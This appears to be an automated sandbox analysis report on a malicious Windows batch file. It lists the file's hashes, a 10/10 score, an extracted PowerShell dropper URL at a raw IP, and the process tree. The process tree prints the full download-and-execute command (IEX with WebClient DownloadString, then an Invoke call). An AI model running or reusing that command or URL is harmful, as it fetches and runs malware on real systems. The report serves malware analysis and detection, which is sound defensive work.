Analysis
-
max time kernel
134s -
max time network
79s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
15-05-2020 19:19
Static task
static1
Behavioral task
behavioral1
Sample
cf3b764eef05fd5d2eaf9b8b4a23a58a.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
cf3b764eef05fd5d2eaf9b8b4a23a58a.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
cf3b764eef05fd5d2eaf9b8b4a23a58a.bat
-
Size
221B
-
MD5
f2a79e7b7a84b63ed4d4793e638c2d4f
-
SHA1
3c0fa1ed487cb193e5134b9631c6a041b190dc73
-
SHA256
cc9bbb89609f9d78b7007196c3424b74594c2bc2db13fe336a1458b8bd8cbe7f
-
SHA512
8236bae5f48871d6ce3a1e4e50663ba551025598dbd5959acfef08ddc685ffdd45b45b3059e3261983504fa9ef027f1fc440491b2bcdfe9076f0b9c705003551
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/cf3b764eef05fd5d2eaf9b8b4a23a58a
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2080 1364 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2080 WerFault.exe Token: SeBackupPrivilege 2080 WerFault.exe Token: SeDebugPrivilege 2080 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe 2080 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cf3b764eef05fd5d2eaf9b8b4a23a58a.bat"1⤵PID:3568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/cf3b764eef05fd5d2eaf9b8b4a23a58a');Invoke-UGWHYUXKHTPVLS;Start-Sleep -s 10000"2⤵PID:1364
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2080